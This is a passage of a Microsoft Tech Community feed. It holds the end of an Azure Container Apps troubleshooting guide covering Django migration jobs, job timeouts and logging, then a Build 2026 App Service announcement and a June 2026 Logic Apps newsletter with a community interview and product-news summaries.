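&lt;P&gt;Whatever port ends up in `bind` must still match the ingress target port, and sending both logs to the console keeps them visible in the Container Apps console logs.&lt;/P&gt;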
&lt;P&gt;&lt;STRONG&gt;Step 4 — Handle database migrations safely.&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;Never run `&lt;STRONG&gt;python manage.py migrate&lt;/STRONG&gt;` as part of your container startup command. If you have multiple replicas, all of them will try to run migrations simultaneously, which can corrupt your schema. Instead, use a Container App Job to run migrations as a pre-deployment step:&lt;/P&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;# Create a one-time Container App Job to run migrations

az containerapp job create 
  --name django-migrate-job 
  --resource-group my-rg 
  --environment my-aca-env 
  --trigger-type Manual 
  --replica-timeout 300 
  --image myregistry.azurecr.io/my-django-app:latest 
  --command "python" 
  --args "manage.py" "migrate" 
  --env-vars 
    "DJANGO_SECRET_KEY=secretref:django-secret-key" 
    "DATABASE_URL=secretref:db-password"


# Execute the migration job before deploying the new revision
az containerapp job start 
  --name django-migrate-job 
  --resource-group my-rg&lt;/LI-CODE&gt;
&lt;H5&gt;&lt;STRONG&gt;Scenario 3: Your Container App Job Fails Silently or Times Out&lt;/STRONG&gt;&lt;/H5&gt;
&lt;H6&gt;&lt;STRONG&gt;What You See&lt;/STRONG&gt;&lt;/H6&gt;
&lt;P&gt;You trigger a Container App Job — maybe it is a nightly data processing job, a scheduled report generator, or a cleanup task — and in the Azure portal the execution shows as &lt;STRONG&gt;Failed &lt;/STRONG&gt;with no helpful error message. Or it shows as&amp;nbsp;&lt;STRONG&gt;Running&lt;/STRONG&gt;&amp;nbsp;for an unusually long time and then transitions to&amp;nbsp;&lt;STRONG&gt;Failed&lt;/STRONG&gt;&amp;nbsp;with a timeout error.&lt;/P&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;H6&gt;&lt;STRONG&gt;Why This Happens&lt;/STRONG&gt;&lt;/H6&gt;
&lt;P&gt;Container App Jobs have a `&lt;STRONG&gt;replicaTimeout&lt;/STRONG&gt;` property. If your job process does not complete within that window, Azure Container Apps kills it and marks the execution as failed. This is different from Container Apps (services) where the container keeps running. Jobs are expected to run to completion and exit with code `&lt;STRONG&gt;0&lt;/STRONG&gt;`.&lt;/P&gt;
&lt;P&gt;The silent failure happens when your job process exits with a non-zero exit code but does not write anything to `&lt;STRONG&gt;stdout&lt;/STRONG&gt;` or `&lt;STRONG&gt;stderr&lt;/STRONG&gt;`. Container Apps records the exit code but has no log content to show you.&lt;/P&gt;
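&lt;P&gt;One way to avoid being killed without a trace is to give the job its own time budget that is shorter than the replica timeout, so it can log and exit on its own terms. The sketch below assumes the work can be split into batches; `Deadline` and `run_batches` are hypothetical names, and the budget you pass in is something you choose.&lt;/P&gt;

```python
import time


class Deadline:
    """Tracks a time budget so a job can stop and log before it is killed."""

    def __init__(self, budget_seconds, clock=time.monotonic):
        self._clock = clock
        self._end = clock() + budget_seconds

    def remaining(self):
        """Seconds left in the budget, never negative."""
        return max(0.0, self._end - self._clock())

    def expired(self):
        return self.remaining() == 0.0


def run_batches(batches, handle, deadline):
    """Process batches until done or out of time; return a process exit code."""
    for index, batch in enumerate(batches):
        if deadline.expired():
            # Write to stdout so the reason shows up in the console logs.
            print("Deadline reached before batch", index, flush=True)
            return 1
        handle(batch)
    return 0


if __name__ == "__main__":
    # Example: a budget of 240 seconds for a job whose replica timeout is 300.
    code = run_batches([1, 2, 3], print, Deadline(240))
    raise SystemExit(code)
```

&lt;P&gt;The exit code still tells Container Apps that the execution failed, but the log line explains why, which the platform-enforced timeout cannot do for you.&lt;/P&gt;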
&lt;H6&gt;&lt;STRONG&gt;Step-by-Step Fix&lt;/STRONG&gt;&lt;/H6&gt;
&lt;P&gt;&lt;STRONG&gt;Step 1 — Make your job emit logs to stdout explicitly.&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;Every print statement, every log line should go to `stdout` or `stderr`. In Python:&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;import sys
import logging
logging.basicConfig(
    level=logging.INFO,
    format="%(asctime)s %(levelname)s %(message)s",
    handlers=[logging.StreamHandler(sys.stdout)]
)
logger = logging.getLogger(__name__)

def main():
    logger.info("Job starting")
    try:
        # your job logic here
        process_data()
        logger.info("Job completed successfully")
        sys.exit(0)

    except Exception as e:
        logger.error(f"Job failed with error: {e}", exc_info=True)
        sys.exit(1)&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;In .NET:&lt;/P&gt;
&lt;LI-CODE lang="csharp"&gt;// Use ILogger which writes to stdout by default in containers
public class MyJob
{
    private readonly ILogger&amp;lt;MyJob&amp;gt; _logger;
    public MyJob(ILogger&amp;lt;MyJob&amp;gt; logger)
    {
        _logger = logger;
    }

    public async Task RunAsync(CancellationToken cancellationToken)
    {
        _logger.LogInformation("Job starting at {Time}", DateTimeOffset.UtcNow);
        try
        {
            await ProcessDataAsync(cancellationToken);
            _logger.LogInformation("Job completed successfully");
        }
        catch (Exception ex)
        {
            _logger.LogError(ex, "Job failed");
            throw; // Let the process exit with non-zero code
        }
    }
}&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Step 2 — Set an appropriate replica timeout and retry count.&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;Be realistic about how long your job takes in production, then add a buffer:&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;az containerapp job update 
  --name my-processing-job 
  --resource-group my-rg 
  --replica-timeout 1800    # 30 minutes
  --replica-retry-limit 2    # Retry twice before marking as failed&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Step 3 — Check job execution history and logs.&lt;/STRONG&gt;&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;# List recent job executions and their status
az containerapp job execution list 
  --name my-processing-job 
  --resource-group my-rg 
  --output table

# Get logs for a specific execution
az containerapp job execution show 
  --name my-processing-job 
  --resource-group my-rg 
  --job-execution-name my-processing-job-abc123&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;From Log Analytics:&lt;/P&gt;
&lt;LI-CODE lang="kusto"&gt;ContainerAppConsoleLogs_CL
| where ContainerAppName_s == "my-processing-job"
| where TimeGenerated &amp;gt; ago(24h)
| project TimeGenerated, Log_s, ContainerName_s
| order by TimeGenerated desc&lt;/LI-CODE&gt;
&lt;H3&gt;Summary: Your Startup Troubleshooting Checklist&lt;/H3&gt;
&lt;P&gt;Before you dig into complex diagnostics, run through this checklist whenever a Container App or Job fails to start:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Are all required environment variables and secrets defined and correctly referenced?&lt;/LI&gt;
&lt;LI&gt;Is the application listening on `0.0.0.0` and on the port that matches the ingress target port?&lt;/LI&gt;
&lt;LI&gt;Does the Dockerfile copy everything needed for the app to run (migrations, static files, etc.)?&lt;/LI&gt;
&lt;LI&gt;Are health probes configured with enough initial delay for the app to start?&lt;/LI&gt;
&lt;LI&gt;For jobs: is the replica timeout long enough, and does the process exit with code 0 on success?&lt;/LI&gt;
&lt;LI&gt;Is the container registry accessible from the Container Apps environment (managed identity or registry credentials configured)?&lt;/LI&gt;
&lt;LI&gt;Are the resource allocations (CPU and memory) sufficient for the application to start without OOM-killing?&lt;/LI&gt;
&lt;/UL&gt;
&lt;H3&gt;References and Sample Resources&lt;/H3&gt;
&lt;P&gt;Use these resources for deeper implementation details and production-ready patterns.&lt;/P&gt;
&lt;H6&gt;&lt;STRONG&gt;Azure Container Apps docs (core)&lt;/STRONG&gt;&lt;/H6&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A class="lia-external-url" href="https://learn.microsoft.com/azure/container-apps/overview" target="_blank"&gt;Azure Container Apps overview&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A class="lia-external-url" href="https://learn.microsoft.com/azure/container-apps/manage-secrets" target="_blank"&gt;Manage secrets in Azure Container Apps&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A class="lia-external-url" href="https://learn.microsoft.com/azure/container-apps/environment-variables" target="_blank"&gt;Manage environment variables in Azure Container Apps&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A class="lia-external-url" href="https://learn.microsoft.com/azure/container-apps/health-probes" target="_blank"&gt;Health probes in Azure Container Apps&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A class="lia-external-url" href="https://learn.microsoft.com/azure/container-apps/ingress-overview" target="_blank"&gt;Ingress in Azure Container Apps&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A class="lia-external-url" href="https://learn.microsoft.com/azure/container-apps/log-streaming" target="_blank"&gt;View logs in Azure Container Apps&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A class="lia-external-url" href="https://learn.microsoft.com/azure/container-apps/jobs" target="_blank"&gt;Azure Container Apps Jobs overview&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A class="lia-external-url" href="https://learn.microsoft.com/azure/container-apps/revisions" target="_blank"&gt;Azure Container Apps revisions&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;H6&gt;&lt;STRONG&gt;.NET and Django references&lt;/STRONG&gt;&lt;/H6&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A class="lia-external-url" href="https://learn.microsoft.com/aspnet/core/fundamentals/configuration" target="_blank"&gt;ASP.NET Core configuration fundamentals&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A class="lia-external-url" href="https://learn.microsoft.com/aspnet/core/host-and-deploy/health-checks" target="_blank"&gt;ASP.NET Core health checks&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A class="lia-external-url" href="https://docs.djangoproject.com/en/stable/howto/deployment/checklist/" target="_blank"&gt;Django deployment checklist&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A class="lia-external-url" href="https://docs.gunicorn.org/en/stable/settings.html" target="_blank"&gt;Gunicorn settings&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;H6&gt;&lt;STRONG&gt;Sample repositories&lt;/STRONG&gt;&lt;/H6&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A class="lia-external-url" href="https://github.com/Azure-Samples/containerapps-albumapi-csharp" target="_blank"&gt;Azure Samples: .NET on Azure Container Apps&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A class="lia-external-url" href="https://github.com/Azure-Samples/containerapps-albumapi-python" target="_blank"&gt;Azure Samples: Python on Azure Container Apps&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A class="lia-external-url" href="https://github.com/Azure-Samples/mcp-container-ts" target="_blank"&gt;Azure Samples: TypeScript MCP container sample&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;H3&gt;What's Next&lt;/H3&gt;
&lt;P&gt;In Part 2 of this series, we move past startup failures and look at what happens after your app is running — the frustrating world of cold starts, scaling delays, and startup latency spikes that make your application feel slow under real production traffic.&lt;/P&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;Part of the series: Troubleshooting Azure Container Apps in Production&amp;nbsp;&lt;/P&gt;
&lt;P&gt;Next: Part 2 — From Slow to Snappy: Performance Tuning Cold Starts and Scaling Delays in Azure Container Apps&lt;/P&gt;</description>
      <pubDate>Tue, 09 Jun 2026 07:58:44 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/microsoft-developer-community/troubleshooting-azure-container-apps-and-jobs-for-net-and-django/ba-p/4518303</guid>
      <dc:creator>BhaktiRath95</dc:creator>
      <dc:date>2026-06-09T07:58:44Z</dc:date>
    </item>
    <item>
      <title>What's new in Azure App Service at #MSBuild 2026</title>
      <link>https://techcommunity.microsoft.com/t5/apps-on-azure-blog/what-s-new-in-azure-app-service-at-msbuild-2026/ba-p/4526569</link>
      <description>&lt;P&gt;At Microsoft Build 2026, Azure App Service introduced a powerful set of updates designed to help organizations accelerate their journey into AI, without increasing complexity or cost. These innovations focus on one clear business outcome: enabling teams to build, deploy, and scale AI-powered applications and agents faster, more securely, and with greater operational efficiency.&lt;/P&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;DIV class="lia-embeded-content" contenteditable="false"&gt;&lt;IFRAME src="https://www.youtube.com/embed/wtUD8IV7rdA?si=Ocp33e23ec6gNXXJ" width="560" height="315" title="YouTube video player" allowfullscreen="allowfullscreen" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" frameborder="0" sandbox="allow-scripts allow-same-origin allow-forms"&gt;&lt;/IFRAME&gt;&lt;/DIV&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;A key highlight is the new &lt;A class="lia-external-url" href="https://aka.ms/Build26/AppService-BuiltInMCP" target="_blank"&gt;&lt;STRONG&gt;Easy AI experience&lt;/STRONG&gt;&lt;/A&gt;, which allows existing web apps to become AI-ready with no rearchitecting required. With capabilities like built-in Model Context Protocol (MCP), developers can instantly expose app functionality as agent-ready endpoints, enabling AI agents to interact with business logic securely and seamlessly. This dramatically reduces development time, allowing teams to move from idea to intelligent application in a fraction of the usual effort.&lt;/P&gt;
&lt;P&gt;Security and compliance are also strengthened with the general availability of &lt;STRONG&gt;&lt;A class="lia-external-url" href="https://aka.ms/AppService/Iv4docs" target="_blank"&gt;Isolated v4&lt;/A&gt; for Azure App Service Environments&lt;/STRONG&gt;, delivering improved performance for customers that need single-tenant isolation and strong data residency guarantees. For enterprises operating in regulated industries, this ensures AI applications meet strict governance requirements without sacrificing scalability or speed.&lt;/P&gt;
&lt;P&gt;For modernization scenarios, &lt;STRONG&gt;Managed Instance on Azure App Service&lt;/STRONG&gt; simplifies the migration of legacy applications, including those with OS-level dependencies. Faster restarts, enhanced diagnostics, and AI-assisted migration workflows help organizations modernize existing systems cost-effectively—avoiding expensive rewrites while unlocking AI capabilities. Recent updates include an AI-assisted approach to migrating legacy IIS applications using a &lt;A class="lia-external-url" href="https://aka.ms/Build26/AgenticIISMigration" target="_blank"&gt;multi-agent workflow&lt;/A&gt; powered by MCP. Managed Instance is supported on both Premium v4 and Isolated v4, laying the foundation for a modern compute infrastructure across the board.&amp;nbsp;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;Operational efficiency is further enhanced through &lt;STRONG&gt;platform and CLI improvements&lt;/STRONG&gt; designed for the “agent era.” From structured deployment diagnostics to optimized Python pipelines delivering faster deployments, these updates reduce friction and infrastructure overhead, lowering total cost of ownership.&amp;nbsp;&lt;/P&gt;
&lt;P&gt;Together, these innovations position Azure App Service as a future-ready platform where businesses can rapidly build intelligent, agent-driven applications securely, efficiently, and at scale.&lt;/P&gt;
&lt;P&gt;👉 Learn more in the full announcement: &lt;A class="lia-external-url" href="https://aka.ms/Build26/blog/AppService" target="_blank"&gt;Deep dive into Azure App Service Build 2026 updates&lt;/A&gt;&lt;/P&gt;</description>
      <pubDate>Mon, 08 Jun 2026 22:30:40 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/apps-on-azure-blog/what-s-new-in-azure-app-service-at-msbuild-2026/ba-p/4526569</guid>
      <dc:creator>Mayunk_Jain</dc:creator>
      <dc:date>2026-06-08T22:30:40Z</dc:date>
    </item>
    <item>
      <title>Logic Apps Aviators Newsletter - June 2026</title>
      <link>https://techcommunity.microsoft.com/t5/azure-integration-services-blog/logic-apps-aviators-newsletter-june-2026/ba-p/4526525</link>
      <description>&lt;P&gt;&lt;STRONG&gt;In this issue:&lt;/STRONG&gt;&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A href="#community--1-aceaviator" target="_blank" rel="noopener"&gt;Ace Aviator of the Month&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A href="#community--1-productnews" target="_blank" rel="noopener"&gt;News from our product group&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A href="#community--1-communitynews" target="_blank" rel="noopener"&gt;News from our community&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;HR /&gt;
&lt;H1 id="aceaviator"&gt;Ace Aviator of the Month&lt;/H1&gt;
&lt;P&gt;&lt;STRONG&gt;June 2026's Ace Aviator:&amp;nbsp;Florian De Langhe&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;LinkedIn: &lt;A href="https://www.linkedin.com/in/floriandelanghe/" target="_blank" rel="noopener nofollow noreferrer"&gt;https://www.linkedin.com/in/floriandelanghe/&lt;/A&gt;&lt;/P&gt;
&lt;img&gt;Florian De Langhe Lead Expert/Team Lead - Microsoft Integration @ delaware&lt;/img&gt;
&lt;H5&gt;What's your role and title? What are your responsibilities?&lt;/H5&gt;
&lt;P&gt;Lead Expert/Team Lead for the Microsoft Integration team at delaware.&lt;BR /&gt;I have a wide range of responsibilities:&lt;BR /&gt;- People management&lt;BR /&gt;- Resource planning&lt;BR /&gt;- Design and operate our integration solutions at our customers, what we brand as "SmartLink".&lt;BR /&gt;&lt;BR /&gt;Next to this, as many of us, I follow the latest AI news closely to keep up to date and try to stay ahead of the curve.&lt;/P&gt;
&lt;H5&gt;Can you give us some insights into your day-to-day activities?&lt;/H5&gt;
&lt;P&gt;I wear many hats so no two days look the same. That is also what keeps it interesting.&lt;BR /&gt;&lt;BR /&gt;A typical day starts with reviewing resource planning across our active projects, followed by a technical design review for a new integration. Sprinkle some one-on-one coaching conversations and research into new technologies/features and you have my day.&lt;BR /&gt;&lt;BR /&gt;The balance between People leadership and hands-on technical work is what I enjoy most.&lt;/P&gt;
&lt;H5&gt;What motivates and inspires you to be an active member of the Aviators/Microsoft community?&lt;/H5&gt;
&lt;P&gt;I started out being an active member on the Microsoft Logic App forum 10 years ago. I remember going back and forth with Wagner through the forum posts trying to solve questions. Good times.&lt;BR /&gt;&lt;BR /&gt;Integration is one of those disciplines where you're constantly connecting systems, teams, and ideas. What motivates me is seeing how members of our community across different companies and countries solve similar problems in completely different ways. The Aviators community has that right mix of deep technical knowledge and willingness to help each other out. Since discovering Integration and the Microsoft community, I basically never left.&lt;/P&gt;
&lt;H5&gt;Looking back, what advice do you wish you had been given earlier?&lt;/H5&gt;
&lt;P&gt;Document everything and treat documentation as a deliverable, not an afterthought.&lt;BR /&gt;Early in my career I saw documentation as the boring part that you do after the development work.&lt;BR /&gt;Now I see it as the leverage point. A well-written design document doesn't just help the next person understand what you built, it compounds. It feeds code generation, easier onboarding of new members and validation with your customers on what and how to build it.&lt;/P&gt;
&lt;H5&gt;What has helped you grow professionally?&lt;/H5&gt;
&lt;P&gt;Two things:&lt;BR /&gt;1) Always challenge yourself and your implementations; everything can be better, so I am always pushing myself to keep learning, stay up to date, and think about every idea/solution posted in this community—how it could improve my way of thinking or solutions that I am building/have built.&lt;BR /&gt;2) Focus on understanding the integration concepts and patterns. At the end of the day everything is a pattern; it is how you implement where we make the difference. So knowing the base layer itself helps a lot when building integration solutions.&lt;/P&gt;
&lt;H5&gt;If you had a magic wand that could create a feature in Logic Apps, what would it be?&lt;/H5&gt;
&lt;P&gt;To be able to control scaling of the workflow service plans more fine grained. Being able to control this would unlock a lot of use cases, especially for the combination of Logic Apps and Service Bus concurrency and throughput.&lt;/P&gt;
&lt;HR /&gt;
&lt;H1 id="productnews"&gt;News from our product group&lt;/H1&gt;
&lt;H5&gt;&lt;A href="https://techcommunity.microsoft.com/blog/integrationsonazureblog/write-logic-apps-in-c-introducing-the-logic-apps-standard-sdk/4524277" target="_blank" rel="noopener noreferrer"&gt;Write Logic Apps in C#: introducing the Logic Apps Standard SDK&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;This article introduces the Logic Apps Standard SDK (Microsoft.Azure.Workflows.Sdk), a code-first way to define Logic Apps Standard workflows in C#. Developers compose workflows using a fluent builder with strongly typed triggers and actions, including both built-in and managed connector operations. The SDK preserves the existing runtime, connectors, monitoring, and run history while changing only the authoring experience. It supports control flow constructs, custom C# code steps, and run-after conditions for fault handling. Guidance covers getting started in VS Code, project layout, local F5 execution, and preview limitations such as no service provider connectors and work-in-progress managed identity support.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://techcommunity.microsoft.com/blog/integrationsonazureblog/new-ai-gateway-capabilities-in-azure-api-management/4524604" target="_blank" rel="noopener noreferrer"&gt;New AI gateway capabilities in Azure API Management&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Azure API Management expands its AI gateway with a Unified Model API (preview) that lets clients use a single OpenAI-style format across providers, plus model aliases and discovery. GA updates include support for Anthropic and Google Vertex AI and content safety for MCP and Agent-to-Agent (A2A) traffic. Token observability now tracks cached, reasoning, and thinking tokens in Application Insights. Foundry import adds Anthropic API operations. A2A APIs reach GA with richer diagnostics and availability in classic tiers. Together, these features standardize governance, security, and observability for multi-model, multi-protocol AI applications.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://techcommunity.microsoft.com/blog/integrationsonazureblog/%F0%9F%8E%89-automation-just-became-a-team-sport-meet-azure-logic-apps-automation-/4524555" target="_blank" rel="noopener noreferrer"&gt;🎉 Automation just became a team sport. Meet Azure Logic Apps Automation.&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Azure Logic Apps Automation (public preview) is a new SKU that delivers a managed, SaaS-like experience for building and running workflow automations. It keeps the enterprise-grade Logic Apps engine while simplifying onboarding, collaboration, and governance with projects and applications, flexible permissions, and policy inheritance. The experience is AI-native with natural language authoring, first-class agents, tools via MCP, and managed sandboxes. It introduces a modern designer, draft mode, live run history, JavaScript expressions, elastic scale to zero, and knowledge-as-a-service integration—aimed at helping teams prototype quickly and operate securely at scale.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://techcommunity.microsoft.com/blog/integrationsonazureblog/%F0%9F%93%A2-announcing-knowledge-as-a-service-for-azure-logic-apps/4524601" target="_blank" rel="noopener noreferrer"&gt;📢 Announcing Knowledge as a Service for Azure Logic Apps&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Knowledge as a Service (public preview) provides a managed knowledge layer for Logic Apps that turns documents into a ready-to-use knowledge base without building a custom RAG pipeline. The service handles ingestion (parsing, chunking, embeddings) and retrieval (query rewriting, semantic search, ranking) and integrates with agentic workflows in Logic Apps Standard and the Automation SKU. On Standard, teams bring their own vector store and models; on Automation, the platform hosts them on behalf of the user. It supports Entra authentication and focuses on secure, grounded responses for agents and workflows.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://techcommunity.microsoft.com/blog/integrationsonazureblog/better-together-build-agents-in-microsoft-foundry-automate-them-with-azure-logic/4524557" target="_blank" rel="noopener noreferrer"&gt;Better Together: Build Agents in Microsoft Foundry, Automate them with Azure Logic Apps&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;This post outlines a combined stack for agentic applications: Microsoft Foundry for building and hosting agents, and Azure Logic Apps for invoking and orchestrating them. New capabilities let teams create or select Foundry agents directly from the Logic Apps designer, pair any trigger with an agent for autonomous execution, and expose 1,400+ Logic Apps connectors and entire workflows as agent tools. The approach enables agents to act across systems, handle long-running processes, and integrate with enterprise events, making deterministic workflows and AI-driven reasoning work together in production.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://techcommunity.microsoft.com/blog/integrationsonazureblog/whats-new-in-azure-api-management-at-microsoft-build-2026/4524683" target="_blank" rel="noopener noreferrer"&gt;What's new in Azure API Management at Microsoft Build 2026&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;This roundup covers Build 2026 updates for API Management and API Center: GA for agent registration, assessment, and Git sync in API Center, plus a data plane MCP server for enterprise discovery. API Management adds GA support for JSON‑RPC agent‑to‑agent (A2A) APIs and extends content safety controls to MCP and A2A flows. Unified Model API enters preview to standardize client integration across model providers, and AI Gateway expands to Anthropic and Vertex AI with broader token metrics. Platform enhancements include multi‑domain and wildcard custom hostnames in v2 tiers and workspace support on the built‑in gateway.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://techcommunity.microsoft.com/blog/integrationsonazureblog/azure-connector-namespaces-managed-integration-for-any-azure-compute/4524250" target="_blank" rel="noopener noreferrer"&gt;Azure Connector Namespaces: managed integration for any Azure compute&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Azure Connector Namespace (preview) offers a fully managed integration layer that brings the Logic Apps connector ecosystem to any Azure or self‑hosted compute without requiring a workflow engine. Apps call strongly typed SDKs for C#, Node.js, or Python to invoke actions and subscribe to triggers, while the namespace handles auth, token rotation, retries, throttling, and webhook delivery. It also projects connectors as MCP servers for agents, and supports hosted MCP servers like Playwright and Azure SQL. The post details building blocks, scenarios, security, governance, and preview limitations.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://techcommunity.microsoft.com/blog/integrationsonazureblog/whats-new-in-azure-logic-apps-at-microsoft-build-2026/4524685" target="_blank" rel="noopener noreferrer"&gt;What's new in Azure Logic Apps at Microsoft Build 2026&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;This Build 2026 overview highlights Logic Apps Automation (public preview), GA for the Logic Apps MCP Server to expose workflows as MCP tools, direct invocation of Microsoft Foundry agents from Logic Apps, Knowledge as a Service, and code‑first development with the Logic Apps Standard SDK (Codeful Workflows). It also introduces a Migration Agent to help modernize from legacy platforms. The theme is making enterprise‑grade automation more accessible while preserving governance, reliability, and operational controls for production use.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://techcommunity.microsoft.com/blog/integrationsonazureblog/hosted-mcp-servers-in-connector-namespace-preview/4524588" target="_blank" rel="noopener noreferrer"&gt;Hosted MCP Servers in Connector Namespace (Preview)&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Hosted MCP servers in Connector Namespace let teams deploy managed, enterprise‑ready MCP servers from a curated catalog in minutes. The platform handles deployment, scaling, authentication (inbound with Entra ID, outbound with managed identity or on‑behalf‑of), availability, and observability via Application Insights. Preview servers include Playwright for browser automation and Azure SQL via Data API Builder, enabling agents to use reliable tools without the overhead of self‑hosting. The post explains setup, benefits over self‑hosted servers, and areas of ongoing investment like catalog expansion and VNet support.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://techcommunity.microsoft.com/blog/integrationsonazureblog/mcp-test-console-and-git-repository-synch-in-azure-api-center/4524617" target="_blank" rel="noopener noreferrer"&gt;MCP Test Console and Git Repository synch in Azure API Center&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Azure API Center adds a built‑in MCP Test Console in the developer portal and Git repository synchronization for MCP servers and other assets. Developers can validate MCP tools interactively on the Documentation tab and browse server tiles with endpoints and schemas. Git sync keeps the API Center inventory aligned with source‑controlled definitions, with secure access via Key Vault and managed identity. Together, these additions streamline discovery, testing, and governance of MCP assets across the enterprise.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://techcommunity.microsoft.com/blog/integrationsonazureblog/bringing-all-your-integration-workloads-to-logic-apps-standard/4517262" target="_blank" rel="noopener noreferrer"&gt;Bringing all your Integration workloads to Logic Apps Standard&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;This post outlines Microsoft’s guided path for moving enterprise integration workloads—especially BizTalk—to Azure Logic Apps Standard. It introduces the open-source Logic Apps Migration Agent, which delivers an AI‑assisted, stage‑gated process across discovery, planning, baseline conversion, and continuous validation with human‑in‑the‑loop checkpoints. The workflow integrates with VS Code and GitHub Copilot, supports incremental “flow‑group” migration, and accommodates existing black‑box tests. The article also previews mission‑critical capabilities arriving for Standard and Hybrid (HL7, MLLP, Rules Engine, MSMQ, Oracle DB, flat‑file generation, Integration Accounts, and more), giving teams a repeatable, auditable modernization path with reduced risk.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://techcommunity.microsoft.com/blog/integrationsonazureblog/announcing-microsoft-host-integration-server-2028-modern-connectivity-for-ibm-ma/4517606" target="_blank" rel="noopener noreferrer"&gt;Announcing Microsoft Host Integration Server 2028: Modern connectivity for IBM Mainframes Midranges&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Host Integration Server 2028 (HIS 2028) is the next HIS release, delivered as a standalone SKU decoupled from BizTalk. It modernizes platform foundations (.NET 10) and, for non‑SNA features, introduces Linux support. New investments include Foundry integration for agent scenarios, REST APIs for DB2 and Transaction Integrator workloads, Entra ID and Azure Arc for hybrid management, a move to Visual Studio Code for designers, and alignment with newer IBM middleware. The post also lists product cleanup and deprecations (e.g., 32‑bit, WMI/WCF, BizTalk adapters), helping enterprises secure, govern, and operate host connectivity for years ahead.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://techcommunity.microsoft.com/blog/integrationsonazureblog/easy-auth-configuration-for-logic-app-standard-through-cicd/4520539" target="_blank" rel="noopener noreferrer"&gt;Easy Auth Configuration for Logic App Standard through CI/CD&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Enabling App Service Easy Auth on Logic Apps Standard can break run‑history views because SAS‑based runtime calls are blocked before the Logic Apps engine can validate them. This article explains two remedies: allow unauthenticated requests (so the runtime enforces its own auth), or keep Easy Auth strict and exclude runtime endpoints (e.g., /runtime/*) using authsettingsV2. It provides CI/CD‑ready approaches via ARM/Bicep templates or a post‑deployment REST API call, and highlights key settings such as requireAuthentication, unauthenticatedClientAction, excludedPaths, and allowedApplications. The guidance restores run‑history usability while maintaining enterprise authentication policies.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://techcommunity.microsoft.com/blog/integrationsonazureblog/run-javascript-code-on-agent-loop/4519880" target="_blank" rel="noopener noreferrer"&gt;Run Javascript code on Agent Loop&lt;/A&gt;&lt;/H5&gt;
